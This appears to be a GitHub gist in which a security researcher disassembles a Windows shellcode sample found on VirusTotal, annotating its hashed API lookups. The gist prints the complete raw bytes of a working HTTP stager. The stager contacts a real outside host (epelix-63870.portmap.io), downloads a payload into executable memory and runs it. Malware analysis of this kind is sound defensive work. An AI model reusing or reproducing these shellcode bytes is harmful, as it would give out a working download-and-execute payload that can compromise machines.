Created
February 13, 2019 16:53
-
-
Save JohnLaTwC/d0b62fcb7aee9fbb93ae95c09e6c9d0b to your computer and use it in GitHub Desktop.
shellcode disams
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @JohnLaTwC | |
| https://www.virustotal.com/en/file/0c30d700b131246e302ff3da1c4180d21f4650db072e287d1b9d477fe88d312f/analysis/ | |
| https://docs.microsoft.com/en-us/windows/desktop/api/wininet/nf-wininet-internetconnecta | |
| void InternetConnectA( | |
| HINTERNET hInternet, | |
| LPCSTR lpszServerName, | |
| INTERNET_PORT nServerPort, | |
| LPCSTR lpszUserName, | |
| LPCSTR lpszPassword, | |
| DWORD dwService, | |
| DWORD dwFlags, | |
| DWORD_PTR dwContext | |
| ); | |
| Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 68 7e f9 00 00 e8 b0 00 00 00 2f 67 53 4d 37 34 54 51 53 41 30 75 51 7a 70 48 50 79 7a 62 38 70 41 33 70 2d 32 59 6d 33 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 65 70 65 6c 69 78 2d 36 33 38 37 30 2e 70 6f 72 74 6d 61 70 2e 69 6f 00 | |
| 0x00000000 fc cld | |
| 0x00000001 e882000000 call 0x00000088 | |
| 0x00000006 60 pushad | |
| 0x00000007 89e5 mov ebp,esp | |
| 0x00000009 31c0 xor eax,eax | |
| 0x0000000b 648b5030 fs: mov edx,dword [eax + 48] | |
| 0x0000000f 8b520c mov edx,dword [edx + 12] | |
| 0x00000012 8b5214 mov edx,dword [edx + 20] | |
| 0x00000015 8b7228 mov esi,dword [edx + 40] | |
| 0x00000018 0fb74a26 movzx ecx,word [edx + 38] | |
| 0x0000001c 31ff xor edi,edi | |
| 0x0000001e ac lodsb | |
| 0x0000001f 3c61 cmp al,97 | |
| 0x00000021 7c02 jl 0x00000025 | |
| 0x00000023 2c20 sub al,32 | |
| 0x00000025 c1cf0d ror edi,13 | |
| 0x00000028 01c7 add edi,eax | |
| 0x0000002a e2f2 loop 0x0000001e | |
| 0x0000002c 52 push edx | |
| 0x0000002d 57 push edi | |
| 0x0000002e 8b5210 mov edx,dword [edx + 16] | |
| 0x00000031 8b4a3c mov ecx,dword [edx + 60] | |
| 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120] | |
| 0x00000038 e348 jecxz 0x00000082 | |
| 0x0000003a 01d1 add ecx,edx | |
| 0x0000003c 51 push ecx | |
| 0x0000003d 8b5920 mov ebx,dword [ecx + 32] | |
| 0x00000040 01d3 add ebx,edx | |
| 0x00000042 8b4918 mov ecx,dword [ecx + 24] | |
| 0x00000045 e33a jecxz 0x00000081 | |
| 0x00000047 49 dec ecx | |
| 0x00000048 8b348b mov esi,dword [ebx + ecx * 4] | |
| 0x0000004b 01d6 add esi,edx | |
| 0x0000004d 31ff xor edi,edi | |
| 0x0000004f ac lodsb | |
| 0x00000050 c1cf0d ror edi,13 | |
| 0x00000053 01c7 add edi,eax | |
| 0x00000055 38e0 cmp al,ah | |
| 0x00000057 75f6 jnz 0x0000004f | |
| 0x00000059 037df8 add edi,dword [ebp - 8] | |
| 0x0000005c 3b7d24 cmp edi,dword [ebp + 36] | |
| 0x0000005f 75e4 jnz 0x00000045 | |
| 0x00000061 58 pop eax | |
| 0x00000062 8b5824 mov ebx,dword [eax + 36] | |
| 0x00000065 01d3 add ebx,edx | |
| 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2] | |
| 0x0000006b 8b581c mov ebx,dword [eax + 28] | |
| 0x0000006e 01d3 add ebx,edx | |
| 0x00000070 8b048b mov eax,dword [ebx + ecx * 4] | |
| 0x00000073 01d0 add eax,edx | |
| 0x00000075 89442424 mov dword [esp + 36],eax | |
| 0x00000079 5b pop ebx | |
| 0x0000007a 5b pop ebx | |
| 0x0000007b 61 popad | |
| 0x0000007c 59 pop ecx | |
| 0x0000007d 5a pop edx | |
| 0x0000007e 51 push ecx | |
| 0x0000007f ffe0 jmp eax | |
| 0x00000081 5f pop edi | |
| 0x00000082 5f pop edi | |
| 0x00000083 5a pop edx | |
| 0x00000084 8b12 mov edx,dword [edx] | |
| 0x00000086 eb8d jmp 0x00000015 | |
| 0x00000088 5d pop ebp | |
| 0x00000089 686e657400 push 0x0074656e--> 'ten' | |
| 0x0000008e 6877696e69 push 0x696e6977--> 'iniw' | |
| 0x00000093 54 push esp | |
| 0x00000094 684c772607 push 0x0726774c--> '&wL' | |
| 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA | |
| 0x0000009b 31db xor ebx,ebx | |
| 0x0000009d 53 push ebx | |
| 0x0000009e 53 push ebx | |
| 0x0000009f 53 push ebx | |
| 0x000000a0 53 push ebx | |
| 0x000000a1 53 push ebx | |
| 0x000000a2 683a5679a7 push 0xa779563a--> 'yV:' | |
| 0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA | |
| 0x000000a9 53 push ebx | |
| 0x000000aa 53 push ebx | |
| 0x000000ab 6a03 push 3 | |
| 0x000000ad 53 push ebx | |
| 0x000000ae 53 push ebx | |
| 0x000000af 687ef90000 push 0x0000f97e | |
| 0x000000b4 e8b0000000 call 0x00000169 | |
| 0x000000b9 2f das <-- start of url | |
| 0x000000ba 6753 push ebx | |
| 0x000000bc 4d dec ebp | |
| 0x000000bd 37 aaa | |
| 0x000000be 3454 xor al,84 | |
| 0x000000c0 51 push ecx | |
| 0x000000c1 53 push ebx | |
| 0x000000c2 41 inc ecx | |
| 0x000000c3 307551 xor byte [ebp + 81],dh | |
| 0x000000c6 7a70 jpe 0x00000138 | |
| 0x000000c8 48 dec eax | |
| 0x000000c9 50 push eax | |
| 0x000000ca 797a jns 0x00000146 | |
| 0x000000cc 6238 bound edi,dword [eax] | |
| 0x000000ce 7041 jo 0x00000111 | |
| 0x000000d0 33702d xor esi,dword [eax + 45] | |
| 0x000000d3 32596d xor bl,byte [ecx + 109] | |
| 0x000000d6 3300 xor eax,dword [eax] | |
| 0x000000d8 50 push eax | |
| 0x000000d9 6857899fc6 push 0xc69f8957 | |
| 0x000000de ffd5 call ebp --> wininet.dll!InternetConnectA | |
| 0x000000e0 89c6 mov esi,eax | |
| 0x000000e2 53 push ebx | |
| 0x000000e3 680032e084 push 0x84e03200 | |
| 0x000000e8 53 push ebx | |
| 0x000000e9 53 push ebx | |
| 0x000000ea 53 push ebx | |
| 0x000000eb 57 push edi | |
| 0x000000ec 53 push ebx | |
| 0x000000ed 56 push esi | |
| 0x000000ee 68eb552e3b push 0x3b2e55eb--> ';.U' | |
| 0x000000f3 ffd5 call ebp --> wininet.dll!HttpOpenRequestA | |
| 0x000000f5 96 xchg eax,esi | |
| 0x000000f6 6a0a push 10 | |
| 0x000000f8 5f pop edi | |
| 0x000000f9 6880330000 push 0x00003380 | |
| 0x000000fe 89e0 mov eax,esp | |
| 0x00000100 6a04 push 4 | |
| 0x00000102 50 push eax | |
| 0x00000103 6a1f push 31 | |
| 0x00000105 56 push esi | |
| 0x00000106 6875469e86 push 0x869e4675--> 'Fu' | |
| 0x0000010b ffd5 call ebp --> wininet.dll!InternetSetOptionA | |
| 0x0000010d 53 push ebx | |
| 0x0000010e 53 push ebx | |
| 0x0000010f 53 push ebx | |
| 0x00000110 53 push ebx | |
| 0x00000111 56 push esi | |
| 0x00000112 682d06187b push 0x7b18062d--> '{-' | |
| 0x00000117 ffd5 call ebp --> wininet.dll!HttpSendRequestA | |
| 0x00000119 85c0 test eax,eax | |
| 0x0000011b 7516 jnz 0x00000133 | |
| 0x0000011d 6888130000 push 0x00001388 | |
| 0x00000122 6844f035e0 push 0xe035f044--> '5D' | |
| 0x00000127 ffd5 call ebp --> kernel32.dll!Sleep | |
| 0x00000129 4f dec edi | |
| 0x0000012a 75cd jnz 0x000000f9 | |
| 0x0000012c 68f0b5a256 push 0x56a2b5f0 | |
| 0x00000131 ffd5 call ebp --> kernel32.dll!ExitProcess | |
| 0x00000133 6a40 push 64 | |
| 0x00000135 6800100000 push 4096 | |
| 0x0000013a 6800004000 push 0x00400000 | |
| 0x0000013f 53 push ebx | |
| 0x00000140 6858a453e5 push 0xe553a458--> 'SX' | |
| 0x00000145 ffd5 call ebp --> kernel32.dll!VirtualAlloc | |
| 0x00000147 93 xchg eax,ebx | |
| 0x00000148 53 push ebx | |
| 0x00000149 53 push ebx | |
| 0x0000014a 89e7 mov edi,esp | |
| 0x0000014c 57 push edi | |
| 0x0000014d 6800200000 push 0x00002000 | |
| 0x00000152 53 push ebx | |
| 0x00000153 56 push esi | |
| 0x00000154 68129689e2 push 0xe2899612 | |
| 0x00000159 ffd5 call ebp --> wininet.dll!InternetReadFile | |
| 0x0000015b 85c0 test eax,eax | |
| 0x0000015d 74cd jz 0x0000012c | |
| 0x0000015f 8b07 mov eax,dword [edi] | |
| 0x00000161 01c3 add ebx,eax | |
| 0x00000163 85c0 test eax,eax | |
| 0x00000165 75e5 jnz 0x0000014c | |
| 0x00000167 58 pop eax | |
| 0x00000168 c3 ret | |
| 0x00000169 5f pop edi | |
| 0x0000016a e869ffffff call 0x000000d8 | |
| 0x0000016f 657065 gs: jo 0x000001d7 <--- start of domain | |
| 0x00000172 6c insb byte [esi],edx | |
| 0x00000173 69782d36333837 imul edi,dword [eax + 45],0x37383336 | |
| 0x0000017a 302e xor byte [esi],ch | |
| 0x0000017c 706f jo 0x000001ed | |
| 0x0000017e 7274 jc 0x000001f4 | |
| 0x00000180 6d insd dword [esi],edx | |
| 0x00000181 61 popad | |
| 0x00000182 702e jo 0x000001b2 | |
| Byte Dump: | |
| ......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSh~......../gSM74TQSA0uQzpHPyzb8pA3p-2Ym3.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{[email protected][email protected]._.i...epelix-63870.portmap.io. | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment